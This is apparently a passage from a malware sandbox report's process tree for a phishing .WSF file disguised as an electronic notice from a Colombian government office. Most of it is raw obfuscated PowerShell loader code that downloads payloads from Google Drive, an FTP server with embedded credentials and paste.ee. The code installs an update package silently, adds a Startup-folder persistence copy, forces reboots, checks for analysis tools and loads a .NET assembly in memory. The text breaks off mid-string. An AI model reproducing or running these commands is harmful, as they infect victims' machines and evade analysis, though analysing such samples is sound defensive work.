'iADIAcAAxACcAIAArACAAdg' + [char]66 + 'mAHEAbQ' + [char]66 + 'uACQAKAAgAD0AIA' + [char]66 + '2AGYAcQ' + [char]66 + 'tAG4AJA' + [char]66 + '7ACAAKQAgAGkAZg' + [char]66 + 'tAHUAWAAkACAAKAAgAGYAaQA7ACAAKQAnADQANgAnACgAcw' + [char]66 + 'uAGkAYQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC4ARQ' + [char]66 + 'SAFUAVA' + [char]66 + 'DAEUAVA' + [char]66 + 'JAEgAQw' + [char]66 + 'SAEEAXw' + [char]66 + 'SAE8AUw' + [char]66 + 'TAEUAQw' + [char]66 + 'PAFIAUAA6AHYAbg' + [char]66 + 'lACQAIAA9ACAAaQ' + [char]66 + 'mAG0AdQ' + [char]66 + 'YACQAOwAnAD0AZA' + [char]66 + 'pACYAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'kAD0AdA' + [char]66 + 'yAG8AcA' + [char]66 + '4AGUAPw' + [char]66 + 'jAHUALw' + [char]66 + 'tAG8AYwAuAGUAbA' + [char]66 + 'nAG8Abw' + [char]66 + 'nAC4AZQ' + [char]66 + '2AGkAcg' + [char]66 + 'kAC8ALwA6AHMAcA' + [char]66 + '0AHQAaAAnACAAPQAgAHYAZg' + [char]66 + 'xAG0AbgAkADsAKQAgACcAdQ' + [char]66 + 'zAG0ALg' + [char]66 + 'uAGkAdw' + [char]66 + 'wAFUAXAAnACAAKwAgAGoATQ' + [char]66 + 'PAHoASAAkACAAKAAgAGwAZQ' + [char]66 + 'kADsAKQAoAGgAdA' + [char]66 + 'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 + 'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'qAE0ATw' + [char]66 + '6AEgAJA' + [char]66 + '7ACAAKQAgAEMAZQ' + [char]66 + 'PAEkAYwAkACAAKAAgAGYAaQA7ACAAKQAyACgAcw' + [char]66 + 'sAGEAdQ' + [char]66 + 'xAEUALg' + [char]66 + 'yAG8Aag' + [char]66 + 'hAE0ALg' + [char]66 + 'uAG8AaQ' + [char]66 + 'zAHIAZQ' + [char]66 + 'WAC4AdA' + [char]66 + 'zAG8AaAAkACAAPQAgAEMAZQ' + [char]66 + 'PAEkAYwAkACAAOwA=';$nymcr = $nymcr.replace('уЦϚ' , 'B') ;;$cpdfb = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $nymcr ) ); $cpdfb = $cpdfb[-1..-$cpdfb.Length] -join '';$cpdfb = $cpdfb.replace('%XRqhI%','C:\Users\Admin\Downloads\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF');powershell $cpdfb
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3204
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $cIOeC = $host.Version.Major.Equals(2) ;if ( $cIOeC ) {$HzOMj = [System.IO.Path]::GetTempPath();del ( $HzOMj + '\Upwin.msu' );$nmqfv = 'https://drive.google.com/uc?export=download&id=';$Xumfi = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $Xumfi ) {$nmqfv = ($nmqfv + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$nmqfv = ($nmqfv + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$zvjwq = (New-Object Net.WebClient);$zvjwq.Encoding = [System.Text.Encoding]::UTF8;$zvjwq.DownloadFile($nmqfv, ($HzOMj + '\Upwin.msu') );$UwfwZ = ('C:\Users\' + [Environment]::UserName );JCCGX = ($HzOMj + '\Upwin.msu'); powershell.exe wusa.exe JCCGX /quiet /norestart ; Copy-Item 'C:\Users\Admin\Downloads\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF' -Destination ( $UwfwZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit; };$nqcnz = ('ftp://[email protected]/Upcrypter' + '/01/DLL01.txt' );$JukpV = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$LQQAB = (-join [char[]](100,101,115,99,107,118,98,114,97,116,49)) ;$lllGq = (-join [char[]](102, 89, 117, 100, 89, 49, 53, 55, 56, 64, 64, 64, 64, 64, 64 )) ;$webClient = New-Object System.Net.WebClient ;$webClient.Credentials = new-object System.Net.NetworkCredential($LQQAB, $lllGq) ;$RVUXv = $webClient.DownloadString( $nqcnz ) ;$RVUXv | Out-File -FilePath $JukpV -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $JukpV ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$aeDwU = '$sNwoM = ''C:\Users\Admin\Downloads\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF'' ; $ryaeG = (Get-Content -Path ' + $STfGl + ' -Encoding UTF8);' ;$aeDwU += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''↓:↓'',''A'') ) ;' ;$aeDwU += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$aeDwU += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$aeDwU += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''0/zpfHt/d/ee.etsap//:sptth'' , $sNwoM , ''DDDMSBuild'' ) );';$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$aeDwU | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;};"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3356
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe JCCGX /quiet /norestart
        6⤵
        
        PID:3768
        
        C:\Windows\system32\wusa.exe
        
        "C:\Windows\system32\wusa.exe" JCCGX /quiet /norestart
        7⤵
        
        PID:3824
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3852
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF"
    3⤵
    - Blocklisted process makes network request
    PID:1716
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $nymcr = 'Ow' + [char]66 + '9ADsAIA' + [char]66 + '6AFcAVw' + [char]66 + 'CAFYAJAAgAGUAbA' + [char]66 + 'pAEYALQAgAHMAcw' + [char]66 + 'hAHAAeQ' + [char]66 + 'CACAAeQ' + [char]66 + 'jAGkAbA' + [char]66 + 'vAFAAbg' + [char]66 + 'vAGkAdA' + [char]66 + '1AGMAZQ' + [char]66 + '4AEUALQAgAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAIA' + [char]66 + '6AFcAVw' + [char]66 + 'CAFYAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAFUAdw' + [char]66 + 'EAGUAYQAkADsAIAApACAAJwAxAHMAcAAuADMAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAAoACAAPQAgAHoAVw' + [char]66 + 'XAEIAVgAkADsAJwA7ACkAIAApACAAIAAnACcAZA' + [char]66 + 'sAGkAdQ' + [char]66 + 'CAFMATQ' + [char]66 + 'EAEQARAAnACcAIAAgACwAIA' + [char]66 + 'NAG8Adw' + [char]66 + 'OAHMAJAAgACwAIAAnACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAHAAYQ' + [char]66 + 'zAHQAZQAuAGUAZQAvAGQALw' + [char]66 + '0AEgAZg' + [char]66 + 'wAHoALwAwACcAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJwAnAEkAVg' + [char]66 + 'GAHIAcAAnACcAIAAoAGQAbw' + [char]66 + 'oAHQAZQAnACAAPQArACAAVQ' + [char]66 + '3AEQAZQ' + [char]66 + 'hACQAOwAgACcATQ' + [char]66 + '0AGUARwAuACkAIAAnACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAJwAgACgAZQ' + [char]66 + 'wAHkAVA' + [char]66 + '0AGUARwAnACAAPQArACAAVQ' + [char]66 + '3AEQAZQ' + [char]66 + 'hACQAOwAgACcALgApACAAeg' + [char]66 + 'kAGYAeQ' + [char]66 + 'GACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAJwAgACsAIAAnADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAJwAgAD0AKwAgAFUAdw' + [char]66 + 'EAGUAYQAkADsAIAAnADsAIAApACAAKQAnACcAQQAnACcALAAnACcAkyE6AJMhJwAnACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAcgAuAEcAZQ' + [char]66 + 'hAHkAcgAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUwA0ADYAZQ' + [char]66 + 'zAGEAQg' + [char]66 + 'tAG8Acg' + [char]66 + 'GADoAOg' + [char]66 + 'dAHQAcg' + [char]66 + 'lAHYAbg' + [char]66 + 'vAEMALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAcw' + [char]66 + 'bACAAPQAgAHoAZA' + [char]66 + 'mAHkARgAkACAAXQ' + [char]66 + 'dAFsAZQ' + [char]66 + '0AHkAQg' + [char]66 + 'bACcAIAA9ACsAIA' + [char]66 + 'VAHcARA' + [char]66 + 'lAGEAJAA7ACAAJwA7ACkAOA' + [char]66 + 'GAFQAVQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAtACAAJwAgACsAIA' + [char]66 + 'sAEcAZg' + [char]66 + 'UAFMAJAAgACsAIAAnACAAaA' + [char]66 + '0AGEAUAAtACAAdA' + [char]66 + 'uAGUAdA' + [char]66 + 'uAG8AQwAtAHQAZQ' + [char]66 + 'HACgAIAA9ACAARw' + [char]66 + 'lAGEAeQ' + [char]66 + 'yACQAIAA7ACAAJwAnACUASQ' + [char]66 + 'oAHEAUg' + [char]66 + 'YACUAJwAnACAAPQAgAE0Abw' + [char]66 + '3AE4AcwAkACcAIAAgAD0AIA' + [char]66 + 'VAHcARA' + [char]66 + 'lAGEAJAA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIA' + [char]66 + 'sAEcAZg' + [char]66 + 'UAFMAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAHoASA' + [char]66 + 'sAFQAdQAkADsAIAApACAAQQ' + [char]66 + 'VAHoASA' + [char]66 + 'EACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAE4AbA' + [char]66 + 'yAGgAUAAkACAAPQAgAHoASA' + [char]66 + 'sAFQAdQAkADsAIAApACAAVg' + [char]66 + 'wAGsAdQ' + [char]66 + 'KACQAIA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC0AIA' + [char]66 + '0AG4AZQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC0AdA' + [char]66 + 'lAEcAIAAoACAAPQAgACAAQQ' + [char]66 + 'VAHoASA' + [char]66 + 'EACQAOwAgADgARg' + [char]66 + 'UAFUAOgA6AF0AZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AdA' + [char]66 + '4AGUAVAAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4ATg' + [char]66 + 'sAHIAaA' + [char]66 + 'QACQAOwAgAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 'DAGIAZQ' + [char]66 + 'XAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUwAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AIAA9ACAATg' + [char]66 + 'sAHIAaA' + [char]66 + 'QACQAOwAgACkAJw' + [char]66 + '0AHgAdAAuADIAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAAoACAAPQAgAGwARw' + [char]66 + 'mAFQAUwAkADsAIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAGYALQAgACcAOA' + [char]66 + 'GAFQAVQAnACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC0AIA' + [char]66 + 'WAHAAaw' + [char]66 + '1AEoAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAHYAWA' + [char]66 + 'VAFYAUgAkADsAIAApACAAeg' + [char]66 + 'uAGMAcQ' + [char]66 + 'uACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 'DAGIAZQ' + [char]66 + '3ACQAIAA9ACAAdg' + [char]66 + 'YAFUAVg' + [char]66 + 'SACQAOwAgACkAcQ' + [char]66 + 'HAGwAbA' + [char]66 + 'sACQAIAAsAEIAQQ' + [char]66 + 'RAFEATAAkACgAbA' + [char]66 + 'hAGkAdA' + [char]66 + 'uAGUAZA' + [char]66 + 'lAHIAQw' + [char]66 + 'rAHIAbw' + [char]66 + '3AHQAZQ' + [char]66 + 'OAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUwAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAC0Adw' + [char]66 + 'lAG4AIAA9ACAAcw' + [char]66 + 'sAGEAaQ' + [char]66 + '0AG4AZQ' + [char]66 + 'kAGUAcg' + [char]66 + 'DAC4AdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAHcAJAA7ACAAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAgAD0AIA' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAdwAkADsAIAApACkAIAA0ADYAIAAsADQANgAgACwANAA2ACAALAA0ADYAIAAsADQANgAgACwANAA2ACAALAA2ADUAIAAsADUANQAgACwAMwA1ACAALAA5ADQAIAAsADkAOAAgACwAMAAwADEAIAAsADcAMQAxACAALAA5ADgAIAAsADIAMAAxACgAXQ' + [char]66 + 'dAFsAcg' + [char]66 + 'hAGgAYw' + [char]66 + 'bACAAbg' + [char]66 + 'pAG8AagAtACgAIAA9ACAAcQ' + [char]66 + 'HAGwAbA' + [char]66 + 'sACQAOwAgACkAKQA5ADQALAA2ADEAMQAsADcAOQAsADQAMQAxACwAOAA5ACwAOAAxADEALAA3ADAAMQAsADkAOQAsADUAMQAxACwAMQAwADEALAAwADAAMQAoAF0AXQ' + [char]66 + 'bAHIAYQ' + [char]66 + 'oAGMAWwAgAG4AaQ' + [char]66 + 'vAGoALQAoACAAPQAgAEIAQQ' + [char]66 + 'RAFEATAAkADsAKQAnAHQAeA' + [char]66 + '0AC4AMQAwAGwAbA' + [char]66 + 'kACcAIAArACAAKQAoAGgAdA' + [char]66 + 'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 + 'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgACgAIAA9ACAAVg' + [char]66 + 'wAGsAdQ' + [char]66 + 'KACQAOwApACAAJw' + [char]66 + '0AHgAdAAuADEAMA' + [char]66 + 'MAEwARAAvADEAMAAvACcAIAArACAAJw' + [char]66 + 'yAGUAdA' + [char]66 + 'wAHkAcg' + [char]66 + 'jAHAAVQAvAHIAYgAuAG0Abw' + [char]66 + 'jAC4AdA' + [char]66 + 'hAHIAYg' + [char]66 + '2AGsAYw' + [char]66 + 'zAGUAZAAuAHAAdA' + [char]66 + 'mAEAAMQ' + [char]66 + '0AGEAcg' + [char]66 + 'iAHYAaw' + [char]66 + 'jAHMAZQ' + [char]66 + 'kAC8ALwA6AHAAdA' + [char]66 + 'mACcAKAAgAD0AIA' + [char]66 + '6AG4AYw' + [char]66 + 'xAG4AJAA7AH0AIAAKAA0AOw' + [char]66 + '0AGkAeA' + [char]66 + 'lACAAIAAgACAAIAAgAAoADQA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIA' + [char]66 + 'yAGUAdA' + [char]66 + '1AHAAbQ' + [char]66 + 'vAEMALQ' + [char]66 + '0AHIAYQ' + [char]66 + '0AHMAZQ' + [char]66 + 'SAAoADQAgAHsAZQ' + [char]66 + 'zAGwAZQAKAA0ACgANAH0ACgANACAAIAAgACAAIAAgACAACgANACAAewApAGwAbA' + [char]66 + '1AE4AJAAgAHEAZQAtACAAKQ' + [char]66 + 'lAHUAbg' + [char]66 + 'pAHQAbg' + [char]66 + 'vAEMAeQ' + [char]66 + 'sAHQAbg' + [char]66 + 'lAGwAaQ' + [char]66 + 'TACAAYQ' + [char]66 + 'lAC0AIAAnAGUAeg' + [char]66 + '5AGwAYQ' + [char]66 + 'uAGEAJwAsACcAUw' + [char]66 + 'OAEQAZQ' + [char]66 + '0AGEAcA' + [char]66 + 'hACcALAAnAGsAcg' + [char]66 + 'hAGgAcw' + [char]66 + 'lAHIAaQ' + [char]66 + 'XACcAIA' + [char]66 + 'zAHMAZQ' + [char]66 + 'jAG8Acg' + [char]66 + 'wAC0AdA' + [char]66 + 'lAGcAKAAoAGYAaQA7ACAAMgAxAHMAbA' + [char]66 + 'UADoAOg' + [char]66 + 'dAGUAcA' + [char]66 + '5AFQAbA' + [char]66 + 'vAGMAbw' + [char]66 + '0AG8Acg' + [char]66 + 'QAHkAdA' + [char]66 + 'pAHIAdQ' + [char]66 + 'jAGUAUwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'sAG8AYw' + [char]66 + 'vAHQAbw' + [char]66 + 'yAFAAeQ' + [char]66 + '0AGkAcg' + [char]66 + '1AGMAZQ' + [char]66 + 'TADoAOg' + [char]66 + 'dAHIAZQ' + [char]66 + 'nAGEAbg' + [char]66 + 'hAE0AdA' + [char]66 + 'uAGkAbw' + [char]66 + 'QAGUAYw' + [char]66 + 'pAHYAcg' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAOwAgAH0AZQ' + [char]66 + '1AHIAdAAkAHsAIAA9ACAAaw' + [char]66 + 'jAGEAYg' + [char]66 + 'sAGwAYQ' + [char]66 + 'DAG4Abw' + [char]66 + 'pAHQAYQ' + [char]66 + 'kAGkAbA' + [char]66 + 'hAFYAZQ' + [char]66 + '0AGEAYw' + [char]66 + 'pAGYAaQ' + [char]66 + '0AHIAZQ' + [char]66 + 'DAHIAZQ' + [char]66 + '2AHIAZQ' + [char]66 + 'TADoAOg' + [char]66 + 'dAHIAZQ' + [char]66 + 'nAGEAbg' + [char]66 + 'hAE0AdA' + [char]66 + 'uAGkAbw' + [char]66 + 'QAGUAYw' + [char]66 + 'pAHYAcg' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAewAgAGUAcw' + [char]66 + 'sAGUAfQAgAGYALwAgADAAIA' + [char]66 + '0AC8AIA' + [char]66 + 'yAC8AIA' + [char]66 + 'lAHgAZQAuAG4Adw' + [char]66 + 'vAGQAdA' + [char]66 + '1AGgAcwAgADsAJwAwADgAMQAgAHAAZQ' + [char]66 + 'lAGwAcwAnACAAZA' + [char]66 + 'uAGEAbQ' + [char]66 + 'tAG8AYwAtACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'sAGwAZQ' + [char]66 + 'oAHMAcg' + [char]66 + 'lAHcAbw' + [char]66 + 'wADsAIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAGYALQAgACkAIAAnAHAAdQ' + [char]66 + '0AHIAYQ' + [char]66 + '0AFMAXA' + [char]66 + 'zAG0AYQ' + [char]66 + 'yAGcAbw' + [char]66 + 'yAFAAXA' + [char]66 + '1AG4AZQ' + [char]66 + 'NACAAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'TAFwAcw' + [char]66 + '3AG8AZA' + [char]66 + 'uAGkAVw' + [char]66 + 'cAHQAZg' + [char]66 + 'vAHMAbw' + [char]66 + 'yAGMAaQ' + [char]66 + 'NAFwAZw' + [char]66 + 'uAGkAbQ' + [char]66 + 'hAG8AUg' + [char]66 + 'cAGEAdA' + [char]66 + 'hAEQAcA' + [char]66 + 'wAEEAXAAnACAAKwAgAFoAdw' + [char]66 + 'mAHcAVQAkACAAKAAgAG4Abw' + [char]66 + 'pAHQAYQ' + [char]66 + 'uAGkAdA' + [char]66 + 'zAGUARAAtACAAJwAlAEkAaA' + [char]66 + 'xAFIAWAAlACcAIA' + [char]66 + 'tAGUAdA' + [char]66 + 'JAC0AeQ' + [char]66 + 'wAG8AQwAgADsAIA' + [char]66 + '0AHIAYQ' + [char]66 + '0AHMAZQ' + [char]66 + 'yAG8AbgAvACAAdA' + [char]66 + 'lAGkAdQ' + [char]66 + 'xAC8AIA' + [char]66 + 'YAEcAQw' + [char]66 + 'DAEoAIA' + [char]66 + 'lAHgAZQAuAGEAcw' + [char]66 + '1AHcAIA' + [char]66 + 'lAHgAZQAuAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAIAA7ACkAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAag' + [char]66 + 'NAE8Aeg' + [char]66 + 'IACQAKAAgAD0AIA' + [char]66 + 'YAEcAQw' + [char]66 + 'DAEoAOwApACAAZQ' + [char]66 + 'tAGEATg' + [char]66 + 'yAGUAcw' + [char]66 + 'VADoAOg' + [char]66 + 'dAHQAbg' + [char]66 + 'lAG0Abg' + [char]66 + 'vAHIAaQ' + [char]66 + '2AG4ARQ' + [char]66 + 'bACAAKwAgACcAXA' + [char]66 + 'zAHIAZQ' + [char]66 + 'zAFUAXAA6AEMAJwAoACAAPQAgAFoAdw' + [char]66 + 'mAHcAVQAkADsAKQAgACkAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAag' + [char]66 + 'NAE8Aeg' + [char]66 + 'IACQAKAAgACwAdg' + [char]66 + 'mAHEAbQ' + [char]66 + 'uACQAKA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHEAdw' + [char]66 + 'qAHYAegAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + 'xAHcAag' + [char]66 + '2AHoAJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + 'xAHcAag' + [char]66 + '2AHoAJAA7AH0AOwAgACkAJw' + [char]66 + '3ADUAMA' + [char]66 + 'aADEAOA' + [char]66 + '1AGMANw' + [char]66 + 'aAE0ASwA4ADgAZw' + [char]66 + 'lAHQAaA' + [char]66 + 'qAG4AQQ' + [char]66 + 'wAGoAMQ' + [char]66 + 'MAEIALQA0AHkASA' + [char]66 + 'hAGEAMQAnACAAKwAgAHYAZg' + [char]66 + 'xAG0AbgAkACgAIAA9ACAAdg' + [char]66 + 'mAHEAbQ' + [char]66 + 'uACQAewAgAGUAcw' + [char]66 + 'sAGUAfQA7ACAAKQAnAFYARQ' + [char]66 + 'TAGQAag' + [char]66 + '3AFUAOQA1AFIALQ' + [char]66 + 'XAHMAWQ' + [char]66 + '1AFoATA' + [char]66 + 'pAHcAcg' + [char]66 + 'iADUAWQ' + [char]66 + 'OAFEALQ' + [char]66 + 'IAGoAcg' + [char]66 + 'iADIAcAAxACcAIAArACAAdg' + [char]66 + 'mAHEAbQ' + [char]66 + 'uACQAKAAgAD0AIA' + [char]66 + '2AGYAcQ' + [char]66 + 'tAG4AJA' + [char]66 + '7ACAAKQAgAGkAZg' + [char]66 + 'tAHUAWAAkACAAKAAgAGYAaQA7ACAAKQAnADQANgAnACgAcw' + [char]66 + 'uAGkAYQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC4ARQ' + [char]66 + 'SAFUAVA' + [char]66 + 'DAEUAVA' + [char]66 + 'JAEgAQw' + [char]66 + 'SAEEAXw' + [char]66 + 'SAE8AUw' + [char]66 + 'TAEUAQw' + [char]66 + 'PAFIAUAA6AHYAbg' + [char]66 + 'lACQAIAA9ACAAaQ' + [char]66 + 'mAG0AdQ' + [char]66 + 'YACQAOwAnAD0AZA' + [char]66 + 'pACYAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'kAD0AdA' + [char]66 + 'yAG8AcA' + [char]66 + '4AGUAPw' + [char]66 + 'jAHUALw' + [char]66 + 'tAG8AYwAuAGUAbA' + [char]66 + 'nAG8Abw' + [char]66 + 'nAC4AZQ' + [char]66 + '2AGkAcg' + [char]66 + 'kAC8ALwA6AHMAcA' + [char]66 + '0AHQAaAAnACAAPQAgAHYAZg' + [char]66 + 'xAG0AbgAkADsAKQAgACcAdQ' + [char]66 + 'zAG0ALg' + [char]66 + 'uAGkAdw' + [char]66 + 'wAFUAXAAnACAAKwAgAGoATQ' + [char]66 + 'PAHoASAAkACAAKAAgAGwAZQ' + [char]66 + 'kADsAKQAoAGgAdA' + [char]66 + 'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 + 